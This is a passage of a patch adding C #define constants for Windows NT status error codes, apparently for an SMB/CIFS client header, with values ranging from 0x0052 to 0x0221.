++#define NT_STATUS_NO_EAS_ON_FILE (0xC0000000 | 0x0052)
++#define NT_STATUS_EA_CORRUPT_ERROR (0xC0000000 | 0x0053)
++#define NT_STATUS_FILE_LOCK_CONFLICT (0xC0000000 | 0x0054)
++#define NT_STATUS_LOCK_NOT_GRANTED (0xC0000000 | 0x0055)
++#define NT_STATUS_DELETE_PENDING (0xC0000000 | 0x0056)
++#define NT_STATUS_CTL_FILE_NOT_SUPPORTED (0xC0000000 | 0x0057)
++#define NT_STATUS_UNKNOWN_REVISION (0xC0000000 | 0x0058)
++#define NT_STATUS_REVISION_MISMATCH (0xC0000000 | 0x0059)
++#define NT_STATUS_INVALID_OWNER (0xC0000000 | 0x005a)
++#define NT_STATUS_INVALID_PRIMARY_GROUP (0xC0000000 | 0x005b)
++#define NT_STATUS_NO_IMPERSONATION_TOKEN (0xC0000000 | 0x005c)
++#define NT_STATUS_CANT_DISABLE_MANDATORY (0xC0000000 | 0x005d)
++#define NT_STATUS_NO_LOGON_SERVERS (0xC0000000 | 0x005e)
++#define NT_STATUS_NO_SUCH_LOGON_SESSION (0xC0000000 | 0x005f)
++#define NT_STATUS_NO_SUCH_PRIVILEGE (0xC0000000 | 0x0060)
++#define NT_STATUS_PRIVILEGE_NOT_HELD (0xC0000000 | 0x0061)
++#define NT_STATUS_INVALID_ACCOUNT_NAME (0xC0000000 | 0x0062)
++#define NT_STATUS_USER_EXISTS (0xC0000000 | 0x0063)
++#define NT_STATUS_NO_SUCH_USER (0xC0000000 | 0x0064)
++#define NT_STATUS_GROUP_EXISTS (0xC0000000 | 0x0065)
++#define NT_STATUS_NO_SUCH_GROUP (0xC0000000 | 0x0066)
++#define NT_STATUS_MEMBER_IN_GROUP (0xC0000000 | 0x0067)
++#define NT_STATUS_MEMBER_NOT_IN_GROUP (0xC0000000 | 0x0068)
++#define NT_STATUS_LAST_ADMIN (0xC0000000 | 0x0069)
++#define NT_STATUS_WRONG_PASSWORD (0xC0000000 | 0x006a)
++#define NT_STATUS_ILL_FORMED_PASSWORD (0xC0000000 | 0x006b)
++#define NT_STATUS_PASSWORD_RESTRICTION (0xC0000000 | 0x006c)
++#define NT_STATUS_LOGON_FAILURE (0xC0000000 | 0x006d)
++#define NT_STATUS_ACCOUNT_RESTRICTION (0xC0000000 | 0x006e)
++#define NT_STATUS_INVALID_LOGON_HOURS (0xC0000000 | 0x006f)
++#define NT_STATUS_INVALID_WORKSTATION (0xC0000000 | 0x0070)
++#define NT_STATUS_PASSWORD_EXPIRED (0xC0000000 | 0x0071)
++#define NT_STATUS_ACCOUNT_DISABLED (0xC0000000 | 0x0072)
++#define NT_STATUS_NONE_MAPPED (0xC0000000 | 0x0073)
++#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED (0xC0000000 | 0x0074)
++#define NT_STATUS_LUIDS_EXHAUSTED (0xC0000000 | 0x0075)
++#define NT_STATUS_INVALID_SUB_AUTHORITY (0xC0000000 | 0x0076)
++#define NT_STATUS_INVALID_ACL (0xC0000000 | 0x0077)
++#define NT_STATUS_INVALID_SID (0xC0000000 | 0x0078)
++#define NT_STATUS_INVALID_SECURITY_DESCR (0xC0000000 | 0x0079)
++#define NT_STATUS_PROCEDURE_NOT_FOUND (0xC0000000 | 0x007a)
++#define NT_STATUS_INVALID_IMAGE_FORMAT (0xC0000000 | 0x007b)
++#define NT_STATUS_NO_TOKEN (0xC0000000 | 0x007c)
++#define NT_STATUS_BAD_INHERITANCE_ACL (0xC0000000 | 0x007d)
++#define NT_STATUS_RANGE_NOT_LOCKED (0xC0000000 | 0x007e)
++#define NT_STATUS_DISK_FULL (0xC0000000 | 0x007f)
++#define NT_STATUS_SERVER_DISABLED (0xC0000000 | 0x0080)
++#define NT_STATUS_SERVER_NOT_DISABLED (0xC0000000 | 0x0081)
++#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED (0xC0000000 | 0x0082)
++#define NT_STATUS_GUIDS_EXHAUSTED (0xC0000000 | 0x0083)
++#define NT_STATUS_INVALID_ID_AUTHORITY (0xC0000000 | 0x0084)
++#define NT_STATUS_AGENTS_EXHAUSTED (0xC0000000 | 0x0085)
++#define NT_STATUS_INVALID_VOLUME_LABEL (0xC0000000 | 0x0086)
++#define NT_STATUS_SECTION_NOT_EXTENDED (0xC0000000 | 0x0087)
++#define NT_STATUS_NOT_MAPPED_DATA (0xC0000000 | 0x0088)
++#define NT_STATUS_RESOURCE_DATA_NOT_FOUND (0xC0000000 | 0x0089)
++#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND (0xC0000000 | 0x008a)
++#define NT_STATUS_RESOURCE_NAME_NOT_FOUND (0xC0000000 | 0x008b)
++#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED (0xC0000000 | 0x008c)
++#define NT_STATUS_FLOAT_DENORMAL_OPERAND (0xC0000000 | 0x008d)
++#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO (0xC0000000 | 0x008e)
++#define NT_STATUS_FLOAT_INEXACT_RESULT (0xC0000000 | 0x008f)
++#define NT_STATUS_FLOAT_INVALID_OPERATION (0xC0000000 | 0x0090)
++#define NT_STATUS_FLOAT_OVERFLOW (0xC0000000 | 0x0091)
++#define NT_STATUS_FLOAT_STACK_CHECK (0xC0000000 | 0x0092)
++#define NT_STATUS_FLOAT_UNDERFLOW (0xC0000000 | 0x0093)
++#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO (0xC0000000 | 0x0094)
++#define NT_STATUS_INTEGER_OVERFLOW (0xC0000000 | 0x0095)
++#define NT_STATUS_PRIVILEGED_INSTRUCTION (0xC0000000 | 0x0096)
++#define NT_STATUS_TOO_MANY_PAGING_FILES (0xC0000000 | 0x0097)
++#define NT_STATUS_FILE_INVALID (0xC0000000 | 0x0098)
++#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED (0xC0000000 | 0x0099)
++#define NT_STATUS_INSUFFICIENT_RESOURCES (0xC0000000 | 0x009a)
++#define NT_STATUS_DFS_EXIT_PATH_FOUND (0xC0000000 | 0x009b)
++#define NT_STATUS_DEVICE_DATA_ERROR (0xC0000000 | 0x009c)
++#define NT_STATUS_DEVICE_NOT_CONNECTED (0xC0000000 | 0x009d)
++#define NT_STATUS_DEVICE_POWER_FAILURE (0xC0000000 | 0x009e)
++#define NT_STATUS_FREE_VM_NOT_AT_BASE (0xC0000000 | 0x009f)
++#define NT_STATUS_MEMORY_NOT_ALLOCATED (0xC0000000 | 0x00a0)
++#define NT_STATUS_WORKING_SET_QUOTA (0xC0000000 | 0x00a1)
++#define NT_STATUS_MEDIA_WRITE_PROTECTED (0xC0000000 | 0x00a2)
++#define NT_STATUS_DEVICE_NOT_READY (0xC0000000 | 0x00a3)
++#define NT_STATUS_INVALID_GROUP_ATTRIBUTES (0xC0000000 | 0x00a4)
++#define NT_STATUS_BAD_IMPERSONATION_LEVEL (0xC0000000 | 0x00a5)
++#define NT_STATUS_CANT_OPEN_ANONYMOUS (0xC0000000 | 0x00a6)
++#define NT_STATUS_BAD_VALIDATION_CLASS (0xC0000000 | 0x00a7)
++#define NT_STATUS_BAD_TOKEN_TYPE (0xC0000000 | 0x00a8)
++#define NT_STATUS_BAD_MASTER_BOOT_RECORD (0xC0000000 | 0x00a9)
++#define NT_STATUS_INSTRUCTION_MISALIGNMENT (0xC0000000 | 0x00aa)
++#define NT_STATUS_INSTANCE_NOT_AVAILABLE (0xC0000000 | 0x00ab)
++#define NT_STATUS_PIPE_NOT_AVAILABLE (0xC0000000 | 0x00ac)
++#define NT_STATUS_INVALID_PIPE_STATE (0xC0000000 | 0x00ad)
++#define NT_STATUS_PIPE_BUSY (0xC0000000 | 0x00ae)
++#define NT_STATUS_ILLEGAL_FUNCTION (0xC0000000 | 0x00af)
++#define NT_STATUS_PIPE_DISCONNECTED (0xC0000000 | 0x00b0)
++#define NT_STATUS_PIPE_CLOSING (0xC0000000 | 0x00b1)
++#define NT_STATUS_PIPE_CONNECTED (0xC0000000 | 0x00b2)
++#define NT_STATUS_PIPE_LISTENING (0xC0000000 | 0x00b3)
++#define NT_STATUS_INVALID_READ_MODE (0xC0000000 | 0x00b4)
++#define NT_STATUS_IO_TIMEOUT (0xC0000000 | 0x00b5)
++#define NT_STATUS_FILE_FORCED_CLOSED (0xC0000000 | 0x00b6)
++#define NT_STATUS_PROFILING_NOT_STARTED (0xC0000000 | 0x00b7)
++#define NT_STATUS_PROFILING_NOT_STOPPED (0xC0000000 | 0x00b8)
++#define NT_STATUS_COULD_NOT_INTERPRET (0xC0000000 | 0x00b9)
++#define NT_STATUS_FILE_IS_A_DIRECTORY (0xC0000000 | 0x00ba)
++#define NT_STATUS_NOT_SUPPORTED (0xC0000000 | 0x00bb)
++#define NT_STATUS_REMOTE_NOT_LISTENING (0xC0000000 | 0x00bc)
++#define NT_STATUS_DUPLICATE_NAME (0xC0000000 | 0x00bd)
++#define NT_STATUS_BAD_NETWORK_PATH (0xC0000000 | 0x00be)
++#define NT_STATUS_NETWORK_BUSY (0xC0000000 | 0x00bf)
++#define NT_STATUS_DEVICE_DOES_NOT_EXIST (0xC0000000 | 0x00c0)
++#define NT_STATUS_TOO_MANY_COMMANDS (0xC0000000 | 0x00c1)
++#define NT_STATUS_ADAPTER_HARDWARE_ERROR (0xC0000000 | 0x00c2)
++#define NT_STATUS_INVALID_NETWORK_RESPONSE (0xC0000000 | 0x00c3)
++#define NT_STATUS_UNEXPECTED_NETWORK_ERROR (0xC0000000 | 0x00c4)
++#define NT_STATUS_BAD_REMOTE_ADAPTER (0xC0000000 | 0x00c5)
++#define NT_STATUS_PRINT_QUEUE_FULL (0xC0000000 | 0x00c6)
++#define NT_STATUS_NO_SPOOL_SPACE (0xC0000000 | 0x00c7)
++#define NT_STATUS_PRINT_CANCELLED (0xC0000000 | 0x00c8)
++#define NT_STATUS_NETWORK_NAME_DELETED (0xC0000000 | 0x00c9)
++#define NT_STATUS_NETWORK_ACCESS_DENIED (0xC0000000 | 0x00ca)
++#define NT_STATUS_BAD_DEVICE_TYPE (0xC0000000 | 0x00cb)
++#define NT_STATUS_BAD_NETWORK_NAME (0xC0000000 | 0x00cc)
++#define NT_STATUS_TOO_MANY_NAMES (0xC0000000 | 0x00cd)
++#define NT_STATUS_TOO_MANY_SESSIONS (0xC0000000 | 0x00ce)
++#define NT_STATUS_SHARING_PAUSED (0xC0000000 | 0x00cf)
++#define NT_STATUS_REQUEST_NOT_ACCEPTED (0xC0000000 | 0x00d0)
++#define NT_STATUS_REDIRECTOR_PAUSED (0xC0000000 | 0x00d1)
++#define NT_STATUS_NET_WRITE_FAULT (0xC0000000 | 0x00d2)
++#define NT_STATUS_PROFILING_AT_LIMIT (0xC0000000 | 0x00d3)
++#define NT_STATUS_NOT_SAME_DEVICE (0xC0000000 | 0x00d4)
++#define NT_STATUS_FILE_RENAMED (0xC0000000 | 0x00d5)
++#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED (0xC0000000 | 0x00d6)
++#define NT_STATUS_NO_SECURITY_ON_OBJECT (0xC0000000 | 0x00d7)
++#define NT_STATUS_CANT_WAIT (0xC0000000 | 0x00d8)
++#define NT_STATUS_PIPE_EMPTY (0xC0000000 | 0x00d9)
++#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO (0xC0000000 | 0x00da)
++#define NT_STATUS_CANT_TERMINATE_SELF (0xC0000000 | 0x00db)
++#define NT_STATUS_INVALID_SERVER_STATE (0xC0000000 | 0x00dc)
++#define NT_STATUS_INVALID_DOMAIN_STATE (0xC0000000 | 0x00dd)
++#define NT_STATUS_INVALID_DOMAIN_ROLE (0xC0000000 | 0x00de)
++#define NT_STATUS_NO_SUCH_DOMAIN (0xC0000000 | 0x00df)
++#define NT_STATUS_DOMAIN_EXISTS (0xC0000000 | 0x00e0)
++#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED (0xC0000000 | 0x00e1)
++#define NT_STATUS_OPLOCK_NOT_GRANTED (0xC0000000 | 0x00e2)
++#define NT_STATUS_INVALID_OPLOCK_PROTOCOL (0xC0000000 | 0x00e3)
++#define NT_STATUS_INTERNAL_DB_CORRUPTION (0xC0000000 | 0x00e4)
++#define NT_STATUS_INTERNAL_ERROR (0xC0000000 | 0x00e5)
++#define NT_STATUS_GENERIC_NOT_MAPPED (0xC0000000 | 0x00e6)
++#define NT_STATUS_BAD_DESCRIPTOR_FORMAT (0xC0000000 | 0x00e7)
++#define NT_STATUS_INVALID_USER_BUFFER (0xC0000000 | 0x00e8)
++#define NT_STATUS_UNEXPECTED_IO_ERROR (0xC0000000 | 0x00e9)
++#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR (0xC0000000 | 0x00ea)
++#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR (0xC0000000 | 0x00eb)
++#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR (0xC0000000 | 0x00ec)
++#define NT_STATUS_NOT_LOGON_PROCESS (0xC0000000 | 0x00ed)
++#define NT_STATUS_LOGON_SESSION_EXISTS (0xC0000000 | 0x00ee)
++#define NT_STATUS_INVALID_PARAMETER_1 (0xC0000000 | 0x00ef)
++#define NT_STATUS_INVALID_PARAMETER_2 (0xC0000000 | 0x00f0)
++#define NT_STATUS_INVALID_PARAMETER_3 (0xC0000000 | 0x00f1)
++#define NT_STATUS_INVALID_PARAMETER_4 (0xC0000000 | 0x00f2)
++#define NT_STATUS_INVALID_PARAMETER_5 (0xC0000000 | 0x00f3)
++#define NT_STATUS_INVALID_PARAMETER_6 (0xC0000000 | 0x00f4)
++#define NT_STATUS_INVALID_PARAMETER_7 (0xC0000000 | 0x00f5)
++#define NT_STATUS_INVALID_PARAMETER_8 (0xC0000000 | 0x00f6)
++#define NT_STATUS_INVALID_PARAMETER_9 (0xC0000000 | 0x00f7)
++#define NT_STATUS_INVALID_PARAMETER_10 (0xC0000000 | 0x00f8)
++#define NT_STATUS_INVALID_PARAMETER_11 (0xC0000000 | 0x00f9)
++#define NT_STATUS_INVALID_PARAMETER_12 (0xC0000000 | 0x00fa)
++#define NT_STATUS_REDIRECTOR_NOT_STARTED (0xC0000000 | 0x00fb)
++#define NT_STATUS_REDIRECTOR_STARTED (0xC0000000 | 0x00fc)
++#define NT_STATUS_STACK_OVERFLOW (0xC0000000 | 0x00fd)
++#define NT_STATUS_NO_SUCH_PACKAGE (0xC0000000 | 0x00fe)
++#define NT_STATUS_BAD_FUNCTION_TABLE (0xC0000000 | 0x00ff)
++#define NT_STATUS_DIRECTORY_NOT_EMPTY (0xC0000000 | 0x0101)
++#define NT_STATUS_FILE_CORRUPT_ERROR (0xC0000000 | 0x0102)
++#define NT_STATUS_NOT_A_DIRECTORY (0xC0000000 | 0x0103)
++#define NT_STATUS_BAD_LOGON_SESSION_STATE (0xC0000000 | 0x0104)
++#define NT_STATUS_LOGON_SESSION_COLLISION (0xC0000000 | 0x0105)
++#define NT_STATUS_NAME_TOO_LONG (0xC0000000 | 0x0106)
++#define NT_STATUS_FILES_OPEN (0xC0000000 | 0x0107)
++#define NT_STATUS_CONNECTION_IN_USE (0xC0000000 | 0x0108)
++#define NT_STATUS_MESSAGE_NOT_FOUND (0xC0000000 | 0x0109)
++#define NT_STATUS_PROCESS_IS_TERMINATING (0xC0000000 | 0x010a)
++#define NT_STATUS_INVALID_LOGON_TYPE (0xC0000000 | 0x010b)
++#define NT_STATUS_NO_GUID_TRANSLATION (0xC0000000 | 0x010c)
++#define NT_STATUS_CANNOT_IMPERSONATE (0xC0000000 | 0x010d)
++#define NT_STATUS_IMAGE_ALREADY_LOADED (0xC0000000 | 0x010e)
++#define NT_STATUS_ABIOS_NOT_PRESENT (0xC0000000 | 0x010f)
++#define NT_STATUS_ABIOS_LID_NOT_EXIST (0xC0000000 | 0x0110)
++#define NT_STATUS_ABIOS_LID_ALREADY_OWNED (0xC0000000 | 0x0111)
++#define NT_STATUS_ABIOS_NOT_LID_OWNER (0xC0000000 | 0x0112)
++#define NT_STATUS_ABIOS_INVALID_COMMAND (0xC0000000 | 0x0113)
++#define NT_STATUS_ABIOS_INVALID_LID (0xC0000000 | 0x0114)
++#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE (0xC0000000 | 0x0115)
++#define NT_STATUS_ABIOS_INVALID_SELECTOR (0xC0000000 | 0x0116)
++#define NT_STATUS_NO_LDT (0xC0000000 | 0x0117)
++#define NT_STATUS_INVALID_LDT_SIZE (0xC0000000 | 0x0118)
++#define NT_STATUS_INVALID_LDT_OFFSET (0xC0000000 | 0x0119)
++#define NT_STATUS_INVALID_LDT_DESCRIPTOR (0xC0000000 | 0x011a)
++#define NT_STATUS_INVALID_IMAGE_NE_FORMAT (0xC0000000 | 0x011b)
++#define NT_STATUS_RXACT_INVALID_STATE (0xC0000000 | 0x011c)
++#define NT_STATUS_RXACT_COMMIT_FAILURE (0xC0000000 | 0x011d)
++#define NT_STATUS_MAPPED_FILE_SIZE_ZERO (0xC0000000 | 0x011e)
++#define NT_STATUS_TOO_MANY_OPENED_FILES (0xC0000000 | 0x011f)
++#define NT_STATUS_CANCELLED (0xC0000000 | 0x0120)
++#define NT_STATUS_CANNOT_DELETE (0xC0000000 | 0x0121)
++#define NT_STATUS_INVALID_COMPUTER_NAME (0xC0000000 | 0x0122)
++#define NT_STATUS_FILE_DELETED (0xC0000000 | 0x0123)
++#define NT_STATUS_SPECIAL_ACCOUNT (0xC0000000 | 0x0124)
++#define NT_STATUS_SPECIAL_GROUP (0xC0000000 | 0x0125)
++#define NT_STATUS_SPECIAL_USER (0xC0000000 | 0x0126)
++#define NT_STATUS_MEMBERS_PRIMARY_GROUP (0xC0000000 | 0x0127)
++#define NT_STATUS_FILE_CLOSED (0xC0000000 | 0x0128)
++#define NT_STATUS_TOO_MANY_THREADS (0xC0000000 | 0x0129)
++#define NT_STATUS_THREAD_NOT_IN_PROCESS (0xC0000000 | 0x012a)
++#define NT_STATUS_TOKEN_ALREADY_IN_USE (0xC0000000 | 0x012b)
++#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED (0xC0000000 | 0x012c)
++#define NT_STATUS_COMMITMENT_LIMIT (0xC0000000 | 0x012d)
++#define NT_STATUS_INVALID_IMAGE_LE_FORMAT (0xC0000000 | 0x012e)
++#define NT_STATUS_INVALID_IMAGE_NOT_MZ (0xC0000000 | 0x012f)
++#define NT_STATUS_INVALID_IMAGE_PROTECT (0xC0000000 | 0x0130)
++#define NT_STATUS_INVALID_IMAGE_WIN_16 (0xC0000000 | 0x0131)
++#define NT_STATUS_LOGON_SERVER_CONFLICT (0xC0000000 | 0x0132)
++#define NT_STATUS_TIME_DIFFERENCE_AT_DC (0xC0000000 | 0x0133)
++#define NT_STATUS_SYNCHRONIZATION_REQUIRED (0xC0000000 | 0x0134)
++#define NT_STATUS_DLL_NOT_FOUND (0xC0000000 | 0x0135)
++#define NT_STATUS_OPEN_FAILED (0xC0000000 | 0x0136)
++#define NT_STATUS_IO_PRIVILEGE_FAILED (0xC0000000 | 0x0137)
++#define NT_STATUS_ORDINAL_NOT_FOUND (0xC0000000 | 0x0138)
++#define NT_STATUS_ENTRYPOINT_NOT_FOUND (0xC0000000 | 0x0139)
++#define NT_STATUS_CONTROL_C_EXIT (0xC0000000 | 0x013a)
++#define NT_STATUS_LOCAL_DISCONNECT (0xC0000000 | 0x013b)
++#define NT_STATUS_REMOTE_DISCONNECT (0xC0000000 | 0x013c)
++#define NT_STATUS_REMOTE_RESOURCES (0xC0000000 | 0x013d)
++#define NT_STATUS_LINK_FAILED (0xC0000000 | 0x013e)
++#define NT_STATUS_LINK_TIMEOUT (0xC0000000 | 0x013f)
++#define NT_STATUS_INVALID_CONNECTION (0xC0000000 | 0x0140)
++#define NT_STATUS_INVALID_ADDRESS (0xC0000000 | 0x0141)
++#define NT_STATUS_DLL_INIT_FAILED (0xC0000000 | 0x0142)
++#define NT_STATUS_MISSING_SYSTEMFILE (0xC0000000 | 0x0143)
++#define NT_STATUS_UNHANDLED_EXCEPTION (0xC0000000 | 0x0144)
++#define NT_STATUS_APP_INIT_FAILURE (0xC0000000 | 0x0145)
++#define NT_STATUS_PAGEFILE_CREATE_FAILED (0xC0000000 | 0x0146)
++#define NT_STATUS_NO_PAGEFILE (0xC0000000 | 0x0147)
++#define NT_STATUS_INVALID_LEVEL (0xC0000000 | 0x0148)
++#define NT_STATUS_WRONG_PASSWORD_CORE (0xC0000000 | 0x0149)
++#define NT_STATUS_ILLEGAL_FLOAT_CONTEXT (0xC0000000 | 0x014a)
++#define NT_STATUS_PIPE_BROKEN (0xC0000000 | 0x014b)
++#define NT_STATUS_REGISTRY_CORRUPT (0xC0000000 | 0x014c)
++#define NT_STATUS_REGISTRY_IO_FAILED (0xC0000000 | 0x014d)
++#define NT_STATUS_NO_EVENT_PAIR (0xC0000000 | 0x014e)
++#define NT_STATUS_UNRECOGNIZED_VOLUME (0xC0000000 | 0x014f)
++#define NT_STATUS_SERIAL_NO_DEVICE_INITED (0xC0000000 | 0x0150)
++#define NT_STATUS_NO_SUCH_ALIAS (0xC0000000 | 0x0151)
++#define NT_STATUS_MEMBER_NOT_IN_ALIAS (0xC0000000 | 0x0152)
++#define NT_STATUS_MEMBER_IN_ALIAS (0xC0000000 | 0x0153)
++#define NT_STATUS_ALIAS_EXISTS (0xC0000000 | 0x0154)
++#define NT_STATUS_LOGON_NOT_GRANTED (0xC0000000 | 0x0155)
++#define NT_STATUS_TOO_MANY_SECRETS (0xC0000000 | 0x0156)
++#define NT_STATUS_SECRET_TOO_LONG (0xC0000000 | 0x0157)
++#define NT_STATUS_INTERNAL_DB_ERROR (0xC0000000 | 0x0158)
++#define NT_STATUS_FULLSCREEN_MODE (0xC0000000 | 0x0159)
++#define NT_STATUS_TOO_MANY_CONTEXT_IDS (0xC0000000 | 0x015a)
++#define NT_STATUS_LOGON_TYPE_NOT_GRANTED (0xC0000000 | 0x015b)
++#define NT_STATUS_NOT_REGISTRY_FILE (0xC0000000 | 0x015c)
++#define NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x015d)
++#define NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR (0xC0000000 | 0x015e)
++#define NT_STATUS_FT_MISSING_MEMBER (0xC0000000 | 0x015f)
++#define NT_STATUS_ILL_FORMED_SERVICE_ENTRY (0xC0000000 | 0x0160)
++#define NT_STATUS_ILLEGAL_CHARACTER (0xC0000000 | 0x0161)
++#define NT_STATUS_UNMAPPABLE_CHARACTER (0xC0000000 | 0x0162)
++#define NT_STATUS_UNDEFINED_CHARACTER (0xC0000000 | 0x0163)
++#define NT_STATUS_FLOPPY_VOLUME (0xC0000000 | 0x0164)
++#define NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND (0xC0000000 | 0x0165)
++#define NT_STATUS_FLOPPY_WRONG_CYLINDER (0xC0000000 | 0x0166)
++#define NT_STATUS_FLOPPY_UNKNOWN_ERROR (0xC0000000 | 0x0167)
++#define NT_STATUS_FLOPPY_BAD_REGISTERS (0xC0000000 | 0x0168)
++#define NT_STATUS_DISK_RECALIBRATE_FAILED (0xC0000000 | 0x0169)
++#define NT_STATUS_DISK_OPERATION_FAILED (0xC0000000 | 0x016a)
++#define NT_STATUS_DISK_RESET_FAILED (0xC0000000 | 0x016b)
++#define NT_STATUS_SHARED_IRQ_BUSY (0xC0000000 | 0x016c)
++#define NT_STATUS_FT_ORPHANING (0xC0000000 | 0x016d)
++#define NT_STATUS_PARTITION_FAILURE (0xC0000000 | 0x0172)
++#define NT_STATUS_INVALID_BLOCK_LENGTH (0xC0000000 | 0x0173)
++#define NT_STATUS_DEVICE_NOT_PARTITIONED (0xC0000000 | 0x0174)
++#define NT_STATUS_UNABLE_TO_LOCK_MEDIA (0xC0000000 | 0x0175)
++#define NT_STATUS_UNABLE_TO_UNLOAD_MEDIA (0xC0000000 | 0x0176)
++#define NT_STATUS_EOM_OVERFLOW (0xC0000000 | 0x0177)
++#define NT_STATUS_NO_MEDIA (0xC0000000 | 0x0178)
++#define NT_STATUS_NO_SUCH_MEMBER (0xC0000000 | 0x017a)
++#define NT_STATUS_INVALID_MEMBER (0xC0000000 | 0x017b)
++#define NT_STATUS_KEY_DELETED (0xC0000000 | 0x017c)
++#define NT_STATUS_NO_LOG_SPACE (0xC0000000 | 0x017d)
++#define NT_STATUS_TOO_MANY_SIDS (0xC0000000 | 0x017e)
++#define NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED (0xC0000000 | 0x017f)
++#define NT_STATUS_KEY_HAS_CHILDREN (0xC0000000 | 0x0180)
++#define NT_STATUS_CHILD_MUST_BE_VOLATILE (0xC0000000 | 0x0181)
++#define NT_STATUS_DEVICE_CONFIGURATION_ERROR (0xC0000000 | 0x0182)
++#define NT_STATUS_DRIVER_INTERNAL_ERROR (0xC0000000 | 0x0183)
++#define NT_STATUS_INVALID_DEVICE_STATE (0xC0000000 | 0x0184)
++#define NT_STATUS_IO_DEVICE_ERROR (0xC0000000 | 0x0185)
++#define NT_STATUS_DEVICE_PROTOCOL_ERROR (0xC0000000 | 0x0186)
++#define NT_STATUS_BACKUP_CONTROLLER (0xC0000000 | 0x0187)
++#define NT_STATUS_LOG_FILE_FULL (0xC0000000 | 0x0188)
++#define NT_STATUS_TOO_LATE (0xC0000000 | 0x0189)
++#define NT_STATUS_NO_TRUST_LSA_SECRET (0xC0000000 | 0x018a)
++#define NT_STATUS_NO_TRUST_SAM_ACCOUNT (0xC0000000 | 0x018b)
++#define NT_STATUS_TRUSTED_DOMAIN_FAILURE (0xC0000000 | 0x018c)
++#define NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE (0xC0000000 | 0x018d)
++#define NT_STATUS_EVENTLOG_FILE_CORRUPT (0xC0000000 | 0x018e)
++#define NT_STATUS_EVENTLOG_CANT_START (0xC0000000 | 0x018f)
++#define NT_STATUS_TRUST_FAILURE (0xC0000000 | 0x0190)
++#define NT_STATUS_MUTANT_LIMIT_EXCEEDED (0xC0000000 | 0x0191)
++#define NT_STATUS_NETLOGON_NOT_STARTED (0xC0000000 | 0x0192)
++#define NT_STATUS_ACCOUNT_EXPIRED (0xC0000000 | 0x0193)
++#define NT_STATUS_POSSIBLE_DEADLOCK (0xC0000000 | 0x0194)
++#define NT_STATUS_NETWORK_CREDENTIAL_CONFLICT (0xC0000000 | 0x0195)
++#define NT_STATUS_REMOTE_SESSION_LIMIT (0xC0000000 | 0x0196)
++#define NT_STATUS_EVENTLOG_FILE_CHANGED (0xC0000000 | 0x0197)
++#define NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT (0xC0000000 | 0x0198)
++#define NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT (0xC0000000 | 0x0199)
++#define NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT (0xC0000000 | 0x019a)
++#define NT_STATUS_DOMAIN_TRUST_INCONSISTENT (0xC0000000 | 0x019b)
++#define NT_STATUS_FS_DRIVER_REQUIRED (0xC0000000 | 0x019c)
++#define NT_STATUS_NO_USER_SESSION_KEY (0xC0000000 | 0x0202)
++#define NT_STATUS_USER_SESSION_DELETED (0xC0000000 | 0x0203)
++#define NT_STATUS_RESOURCE_LANG_NOT_FOUND (0xC0000000 | 0x0204)
++#define NT_STATUS_INSUFF_SERVER_RESOURCES (0xC0000000 | 0x0205)
++#define NT_STATUS_INVALID_BUFFER_SIZE (0xC0000000 | 0x0206)
++#define NT_STATUS_INVALID_ADDRESS_COMPONENT (0xC0000000 | 0x0207)
++#define NT_STATUS_INVALID_ADDRESS_WILDCARD (0xC0000000 | 0x0208)
++#define NT_STATUS_TOO_MANY_ADDRESSES (0xC0000000 | 0x0209)
++#define NT_STATUS_ADDRESS_ALREADY_EXISTS (0xC0000000 | 0x020a)
++#define NT_STATUS_ADDRESS_CLOSED (0xC0000000 | 0x020b)
++#define NT_STATUS_CONNECTION_DISCONNECTED (0xC0000000 | 0x020c)
++#define NT_STATUS_CONNECTION_RESET (0xC0000000 | 0x020d)
++#define NT_STATUS_TOO_MANY_NODES (0xC0000000 | 0x020e)
++#define NT_STATUS_TRANSACTION_ABORTED (0xC0000000 | 0x020f)
++#define NT_STATUS_TRANSACTION_TIMED_OUT (0xC0000000 | 0x0210)
++#define NT_STATUS_TRANSACTION_NO_RELEASE (0xC0000000 | 0x0211)
++#define NT_STATUS_TRANSACTION_NO_MATCH (0xC0000000 | 0x0212)
++#define NT_STATUS_TRANSACTION_RESPONDED (0xC0000000 | 0x0213)
++#define NT_STATUS_TRANSACTION_INVALID_ID (0xC0000000 | 0x0214)
++#define NT_STATUS_TRANSACTION_INVALID_TYPE (0xC0000000 | 0x0215)
++#define NT_STATUS_NOT_SERVER_SESSION (0xC0000000 | 0x0216)
++#define NT_STATUS_NOT_CLIENT_SESSION (0xC0000000 | 0x0217)
++#define NT_STATUS_CANNOT_LOAD_REGISTRY_FILE (0xC0000000 | 0x0218)
++#define NT_STATUS_DEBUG_ATTACH_FAILED (0xC0000000 | 0x0219)
++#define NT_STATUS_SYSTEM_PROCESS_TERMINATED (0xC0000000 | 0x021a)
++#define NT_STATUS_DATA_NOT_ACCEPTED (0xC0000000 | 0x021b)
++#define NT_STATUS_NO_BROWSER_SERVERS_FOUND (0xC0000000 | 0x021c)
++#define NT_STATUS_VDM_HARD_ERROR (0xC0000000 | 0x021d)
++#define NT_STATUS_DRIVER_CANCEL_TIMEOUT (0xC0000000 | 0x021e)
++#define NT_STATUS_REPLY_MESSAGE_MISMATCH (0xC0000000 | 0x021f)
++#define NT_STATUS_MAPPED_ALIGNMENT (0xC0000000 | 0x0220)
++#define NT_STATUS_IMAGE_CHECKSUM_MISMATCH (0xC0000000 | 0x0221)
